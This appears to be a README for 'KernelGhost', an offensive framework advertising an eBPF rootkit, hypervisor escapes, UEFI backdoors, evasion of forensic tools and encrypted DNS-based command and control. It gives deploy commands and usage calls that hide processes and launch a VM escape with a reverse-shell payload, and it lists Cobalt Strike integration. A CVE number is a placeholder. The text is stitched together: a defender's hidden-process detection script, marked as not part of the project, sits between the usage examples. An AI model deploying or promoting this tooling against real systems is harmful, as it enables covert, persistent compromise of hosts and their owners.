KernelGhost is a next-generation offensive security framework that combines stealthy eBPF-based rootkit capabilities with advanced hypervisor escape techniques. It enables persistent cross-VM access, stealth process hiding, UEFI firmware backdoors, and more all while evading modern detection systems.

🔥 KernelGhost: Hypervisor & eBPF Rootkit Framework

Next-generation offensive security framework combining eBPF stealth and hypervisor-level exploitation
"When userland isn't enough and the kernel isn't safe"


📌 Features

🕵️‍♂️ Core Capabilities

  • eBPF-Based Rootkit

    • Process/network hiding via syscall hooking
    • /proc and /sys filesystem manipulation
    • Anti-forensic BPF verifier bypasses
  • Hypervisor Escapes

    • KVM/QEMU guest-to-host memory writes
    • Hyper-V VMBus ring buffer exploitation (CVE-2023-XXXX)
    • Nested virtualization attacks
  • Advanced Persistence

    • UEFI firmware implants via SPI flash
    • Initramfs backdoor injection
    • Cross-VM migration survival

🛡️ Defense Evasion

| Technique | Implementation | Bypasses |
|---|---|---|
| Kernel Symbol Obfuscation | `__ksymtab` modification | Sysdig, ftrace |
| Memory Cloaking | Nested Page Table manipulation | LiME, Volatility |
| Cryptographic C2 | AES-256-GCM over DNS-over-HTTPS | Network IDS |

🚀 Quick Start

🔧 Prerequisites

```bash
# Ubuntu 22.04+ (Linux kernel ≥5.15)
sudo apt install linux-headers-$(uname -r) clang-15 bpftool qemu-kvm
```

🛠️ Installation

```bash
git clone https://github.com/Aviral2642/kernelghost.git
cd kernelghost
make all -j$(nproc)
sudo make deploy
```

🧪 Basic Usage

```python
from ghostctl import Ghost

# Hide process from detection
gh = Ghost()
gh.hide_pid(1337)

# Execute hypervisor escape
if gh.check_hypervisor() == "KVM":
    gh.escape_vm(payload="reverse_shell")
```

🧩 Examples

🔍 Process Ghosting

```bash
# Hide current shell process
./examples/process_ghosting $$

# Verify hiding (should show error)
ps -p $$
```
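The `ps -p $$` check above only consults the view the rootkit has already altered. A defender-side cross-check, added here as an example and not part of the KernelGhost project, compares two independent views of the process table: the PIDs (and thread IDs) that the `/proc` directory listing admits to, and the PIDs that answer a zero-signal probe via `os.kill(pid, 0)`. A PID that answers the probe but is missing from the listing is a candidate hidden process. The code assumes Linux procfs and POSIX `kill` semantics; `find_hidden_pids` takes both views as parameters so it can be exercised on constructed data, and the `__main__` block runs the live scan twice and keeps only PIDs flagged both times, which filters out processes that were created or exited between the two listings.

```python
import os


def list_proc_pids(proc_root="/proc"):
    """PIDs and thread IDs the procfs listing admits to (the view ps/top use).

    Thread IDs are included deliberately: kill(tid, 0) succeeds for a thread
    that is not its group leader, and such a TID never appears as a top-level
    /proc entry, so without this it would be misreported as a hidden process.
    """
    seen = set()
    for name in os.listdir(proc_root):
        if not name.isdigit():
            continue
        seen.add(int(name))
        try:
            tasks = os.listdir(f"{proc_root}/{name}/task")
        except OSError:
            continue  # process exited between the two listings
        seen.update(int(t) for t in tasks if t.isdigit())
    return seen


def pid_is_alive(pid):
    """Probe a PID with signal 0 (no signal is delivered).

    ProcessLookupError (ESRCH) means no such process; PermissionError (EPERM)
    means the process exists but belongs to another user, which for this
    check still counts as "alive".
    """
    try:
        os.kill(pid, 0)
    except ProcessLookupError:
        return False
    except PermissionError:
        return True
    return True


def read_pid_max(path="/proc/sys/kernel/pid_max", default=32768):
    """Upper bound of the PID space; falls back to a constructed default."""
    try:
        with open(path) as f:
            return int(f.read().strip())
    except (OSError, ValueError):
        return default


def find_hidden_pids(visible_pids, alive, pid_max):
    """Return PIDs that answer the probe but are absent from the listing.

    `visible_pids` is the set from the directory view and `alive` a predicate
    implementing the probe view; both are injected so the logic can be run on
    constructed inputs.
    """
    return sorted(pid for pid in range(1, pid_max + 1)
                  if pid not in visible_pids and alive(pid))


if __name__ == "__main__":
    pid_max = read_pid_max()
    # Two passes; a PID must be flagged in both to survive, which drops
    # transient hits from processes starting or exiting mid-scan.
    first = set(find_hidden_pids(list_proc_pids(), pid_is_alive, pid_max))
    second = set(find_hidden_pids(list_proc_pids(), pid_is_alive, pid_max))
    confirmed = sorted(first & second)
    print("hidden process candidates:", confirmed or "none")
```

A rootkit that hooks syscalls can tamper with the probe view as well as the listing, so an empty result is evidence, not proof; the value of the check is that an attacker must now keep two views consistent, and a mismatch is a strong signal worth escalating to offline memory analysis.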

🧨 VM Escape PoC

```bash
# Launch attack on KVM host
./examples/vm_escape_poc --payload host_mem_dump.bin
```

🎯 Cobalt Strike Integration

```bash
python examples/cs_integration.py --listen 443 --aes-key $(openssl rand -hex 32)
```

📚 Documentation

| Document | Description |
|---|---|
| TECHNICAL.md | Architecture, attack flows, internals |
| DEPLOYMENT.md | Deployment checklist, OPSEC practices |

🛠️ Development

🔧 Build Options

```bash
# Build with debug symbols
make DEBUG=1

# Cross-compile for ARM64
make ARCH=arm64 CROSS_COMPILE=aarch64-linux-gnu-
```

✅ Testing

```bash
# Run kernel module tests
make -C tests kunit

# eBPF verifier bypass tests
./tests/verify_bypass.sh
```

🌟 Roadmap

  • ✅ ARM64/M1 Silicon Support (Q4 2024)
  • ⏳ Windows Hyper-V Rootkit Module (Q1 2025)
  • 🚧 Quantum-Safe C2 Channels (PQ3/TLS1.3+)

⚠️ Disclaimer

This project is intended for:

  • ✅ Authorized red team engagements
  • ✅ Academic research on advanced persistence
  • ✅ Defensive countermeasure development

Never use this tool for unauthorized access. Developers assume no liability for misuse.
